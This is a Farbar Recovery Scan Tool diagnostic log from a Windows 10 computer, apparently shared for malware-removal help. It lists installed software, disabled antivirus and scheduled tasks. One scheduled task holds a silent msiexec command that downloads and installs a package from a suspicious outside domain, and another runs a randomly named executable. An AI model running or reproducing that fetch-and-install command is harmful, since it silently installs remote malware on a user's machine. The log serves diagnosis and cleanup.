Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30.01.2019
Ran by flipp (31-01-2019 13:27:28)
Running from C:\Users\flipp\Desktop
Windows 10 Home Single Language Version 1803 17134.523 (X64) (2018-08-16 11:24:28)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================
Administrador (S-1-5-21-1103162910-2907697783-2557054662-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1103162910-2907697783-2557054662-503 - Limited - Disabled)
flipp (S-1-5-21-1103162910-2907697783-2557054662-1001 - Administrator - Enabled) => C:\Users\flipp
Invitado (S-1-5-21-1103162910-2907697783-2557054662-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-1103162910-2907697783-2557054662-504 - Limited - Disabled)

==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: VirusScan de McAfee (Disabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: VirusScan de McAfee (Disabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501}
FW: McAfee Firewall (Enabled) {B3F62DDF-980B-3470-75A7-407A2E6F58C7}

==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\uTorrent) (Version: 3.5.4.44846 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
Apple Application Support (32 bits) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64 bits) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player PRO (HKLM-x32\...\BSPlayerp) (Version: 2.73.1083 - AB Team, d.o.o.)
Camtasia Studio 7 (HKLM-x32\...\{C0E8FE43-C35B-451D-B35F-D4BD056D70E7}) (Version: 7.1.1 - TechSmith Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.64 - Synaptics Incorporated)
Eines de correcció del Microsoft Office 2013: català (HKLM\...\{90150000-001F-0403-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2013 - Galego (HKLM\...\{90150000-001F-0456-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
iTunes (HKLM\...\{514BCD3A-B38B-4835-8B8C-69DA8C48A7A7}) (Version: 12.9.3.3 - Apple Inc.)
Java 8 Update 201 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
KeePass Password Safe 2.41 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.41 - Dominik Reichl)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.6.9060.3 - Waves Audio Ltd.) Hidden
McAfee AntiVirus Plus (HKLM-x32\...\MSC) (Version: 16.0 R17 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.0.17 - McAfee, Inc.)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\OneDriveSetup.exe) (Version: 18.240.1202.0004 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 65.0 (x64 es-MX) (HKLM\...\Mozilla Firefox 65.0 (x64 es-MX)) (Version: 65.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0 - Mozilla)
Mp3tag v2.90a (HKLM-x32\...\Mp3tag) (Version: 2.90a - Florian Heidenreich)
NetSpot (HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\a6e43da6e76c5494) (Version: 2.10.1.680 - Etwok LLC)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.5.9 - Notepad++ Team)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31228 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8142 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (HKLM\...\{90150000-001F-0416-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Speccy (HKLM\...\Speccy) (Version: 1.32 - Piriform)
Syncios 6.5.4 (HKLM-x32\...\Syncios) (Version: 6.5.4 - Anvsoft)
Update for Skype for Business 2015 (KB4461557) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{06CB9397-D762-4A2F-8D91-DFAD58D2BAED}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB4461557) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{06CB9397-D762-4A2F-8D91-DFAD58D2BAED}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB4461557) 64-Bit Edition (HKLM\...\{90150000-012B-0C0A-1000-0000000FF1CE}_Office15.PROPLUS_{06CB9397-D762-4A2F-8D91-DFAD58D2BAED}) (Version: - Microsoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
WinRAR 5.61 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH)
WinSnap (HKLM-x32\...\WinSnap) (Version: 4.6.4 - NTWind Software)

==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1103162910-2907697783-2557054662-1001_Classes\CLSID\{6eb1ea83-c3dd-47a2-b938-4a1e7d2d3bef}\InprocServer32 -> C:\Windows\system32\dfshim.dll (Microsoft Corporation)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2018-07-22] ()
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd)
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\program files\mcafee\msc\mcctxmenufrmwrk.dll [2018-11-27] (McAfee, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2018-07-12] (Florian Heidenreich)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2018-07-12] (Florian Heidenreich)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2018-07-12] (Florian Heidenreich)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2016-11-01] (Intel Corporation)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd)
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\program files\mcafee\msc\mcctxmenufrmwrk.dll [2018-11-27] (McAfee, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0C10A8FC-458B-4F7D-A9A4-FF4C2E1F873D} - System32\Tasks\{A7A4C55F-20E4-9E84-7E16-07D912FEBD60} => C:\Windows\SysWOW64\NNbIJUy.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0F5E203D-524C-4DE2-BBC2-6D952681EB03} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2018-11-13] (McAfee, Inc.)
Task: {1082CF4F-B353-43BC-AD84-480C08E49A6B} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe [2018-10-30] (McAfee, Inc.)
Task: {116272AA-9995-406C-8179-1167A773A38F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {20B00A05-7D0F-4994-9651-BE709626197A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {20EB9757-8CE3-4386-872A-82588D412DA9} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2018-01-08] (Apple Inc.)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-11] ()
Task: {684A5822-1CE1-4E77-82DC-813E520B6C18} - System32\Tasks\{72514941-C9C4-3690-D439-6D98DEEB0584} => "msiexec" -package hxxps://refreshnerer711.info/ZUY1oNVES.yVs /q
Task: {6EDEDCB9-AE0E-494C-9579-A5408D43C84B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {855FBB8C-3FD3-4CE9-B985-7DDD0723012F} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {8862E9D1-31A5-46FB-B3AB-01BBD35858D2} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd)
Task: {B1A651FC-1EBF-4985-87E8-F39E839083E9} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-01-10] (Piriform Ltd)
Task: {BF533E2F-BCB7-47E2-B48F-5E6735A73CA2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {CF183B1C-AA1F-4381-9DA5-AF991EB7D247} - System32\Tasks\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.6.319\mcdatrep.exe [2018-09-11] (McAfee, LLC.)
Task: {CF4BCF28-4F56-482A-B758-248EE7AF2ABE} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" was unlocked. <==== ATTENTION
Task: {E284EAE7-2238-47E7-BDC6-54F7172820E0} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {E2C44D4D-F556-443A-A5F1-540E1EA68FC1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============
2018-10-21 02:17 - 2018-10-21 02:17 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-06-29 14:34 - 2018-06-29 14:34 - 000896136 _____ () C:\Program Files\Common Files\McAfee\CSP\3.0.127.0\McCSPMsgBusDLL.dll
2018-04-11 17:34 - 2018-04-11 17:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2016-11-01 15:05 - 2016-11-01 15:05 - 000401896 _____ () C:\Windows\system32\igfxTray.exe
2018-04-11 17:34 - 2018-04-11 17:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-11 20:42 - 2018-11-08 20:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-07-22 18:14 - 2018-07-22 18:14 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2019-01-09 12:58 - 2019-01-01 00:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-10-15 14:18 - 2018-10-15 14:19 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\ChakraBridge.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 000019456 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\SkypeProxiesAndStubs.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 010936320 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\LibWrapper.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 002920960 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\skypert.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 000688128 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll
2018-12-14 14:28 - 2018-12-14 14:31 - 002384384 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\Processing.NDI.Lib.UWP.x64.dll
2018-08-16 13:35 - 2018-08-16 13:35 - 001922224 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 028012544 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\Video.UI.exe
2019-01-22 15:39 - 2019-01-22 15:40 - 000305152 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\SharedUI.dll
2018-04-12 10:27 - 2018-04-12 10:27 - 000902656 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.UI.Xaml.dll
2018-11-28 11:47 - 2018-11-28 11:48 - 004202208 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2019-01-22 15:39 - 2019-01-22 15:40 - 006187520 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\EntCommon.dll
2019-01-22 15:39 - 2019-01-22 15:39 - 009388544 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\EntPlat.dll
2018-06-29 00:26 - 2018-06-29 00:26 - 002443384 _____ () C:\Program Files (x86)\Anvsoft\Syncios\SynciosDeviceService.exe
2018-07-30 01:42 - 2018-07-30 01:42 - 000017016 _____ () C:\Program Files (x86)\Anvsoft\Syncios\androidnotifier.exe
2018-06-27 20:17 - 2018-06-27 20:17 - 001091896 _____ () C:\Program Files (x86)\Anvsoft\Syncios\adb.exe
2019-01-02 04:28 - 2019-01-02 04:28 - 000059376 _____ () C:\Program Files\CCleaner\branding.dll
2019-01-10 04:01 - 2019-01-10 04:01 - 000103560 _____ () C:\Program Files\CCleaner\lang\lang-1034.dll
2019-01-16 21:17 - 2019-01-16 21:18 - 000478720 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2019-01-16 21:17 - 2019-01-16 21:17 - 065903104 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2018-08-16 13:29 - 2018-08-16 13:32 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll
2019-01-16 21:17 - 2019-01-16 21:18 - 000012288 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll
2018-11-15 16:19 - 2018-11-15 16:20 - 003715072 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll
2018-11-15 16:19 - 2018-11-15 16:20 - 000036352 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\WinMLWrapper.UWP.dll
2018-08-16 13:29 - 2018-08-16 13:32 - 002480640 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\opencv_imgproc320.dll
2018-08-16 13:29 - 2018-08-16 13:32 - 002280960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\opencv_core320.dll
2018-08-16 13:29 - 2018-08-16 13:32 - 002283008 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\TrackingDLLUWP.dll
2019-01-16 21:17 - 2019-01-16 21:17 - 014186496 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2018-11-15 16:19 - 2018-11-15 16:20 - 003569152 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2019-01-16 21:17 - 2019-01-16 21:18 - 002871296 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2018-09-03 12:12 - 2018-09-03 12:14 - 000973312 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2018-08-16 13:29 - 2018-08-16 13:32 - 004584960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-12-11 20:18 - 2018-12-11 20:18 - 004220928 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1811.3241.0_x64__8wekyb3d8bbwe\Calculator.exe
2018-12-11 20:15 - 2018-12-11 20:15 - 004380232 _____ () C:\Program Files\WindowsApps\Microsoft.UI.Xaml.2.0_2.1810.18003.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-09-11 20:38 - 2018-06-20 15:22 - 064144704 _____ () C:\Program Files\Common Files\McAfee\CEF\libcef.dll
2018-07-30 01:48 - 2018-07-30 01:48 - 001514496 _____ () C:\Program Files (x86)\Anvsoft\Syncios\DuiLib.dll
2018-07-30 01:42 - 2018-07-30 01:42 - 000075264 _____ () C:\Program Files (x86)\Anvsoft\Syncios\generalFunc_pdt.dll
2018-07-30 01:42 - 2018-07-30 01:42 - 001309184 _____ () C:\Program Files (x86)\Anvsoft\Syncios\androidSyncCore_pdm.dll
2018-07-30 01:42 - 2018-07-30 01:42 - 000178688 _____ () C:\Program Files (x86)\Anvsoft\Syncios\driverMgr4Transfer_pdm.dll
2017-10-29 18:38 - 2017-10-29 18:38 - 000571392 _____ () C:\Program Files (x86)\Anvsoft\Syncios\sqlite3.dll
2017-10-29 18:40 - 2017-10-29 18:40 - 000592896 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libsscan.dll
2017-11-05 21:28 - 2017-11-05 21:28 - 013524469 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libheic.dll
2018-03-14 18:55 - 2018-03-14 18:55 - 001487360 _____ () C:\Program Files (x86)\Anvsoft\Syncios\exiv2.dll
2017-10-29 18:42 - 2017-10-29 18:42 - 001970688 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libplist.dll
2017-10-29 18:38 - 2017-10-29 18:38 - 001042432 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libandroidrecovery.dll
2018-07-30 01:42 - 2018-07-30 01:42 - 001278072 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libandroidnotifier.dll
2017-10-30 02:06 - 2017-10-30 02:06 - 004554857 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libexiv2.dll
2017-10-30 02:06 - 2017-10-30 02:06 - 000121524 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libgcc_s_dw2-1.dll
2017-10-30 02:06 - 2017-10-30 02:06 - 001544523 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libstdc++-6.dll
2018-03-14 18:55 - 2018-03-14 18:55 - 000104448 _____ () C:\Program Files (x86)\Anvsoft\Syncios\expat.dll
2017-10-29 18:41 - 2017-10-29 18:41 - 000066048 _____ () C:\Program Files (x86)\Anvsoft\Syncios\zlib1.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2017-10-29 18:41 - 2017-10-29 18:41 - 000671744 _____ () C:\Program Files (x86)\Anvsoft\Syncios\hashAB.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll

==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2018-04-11 17:38 - 2018-04-11 17:36 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
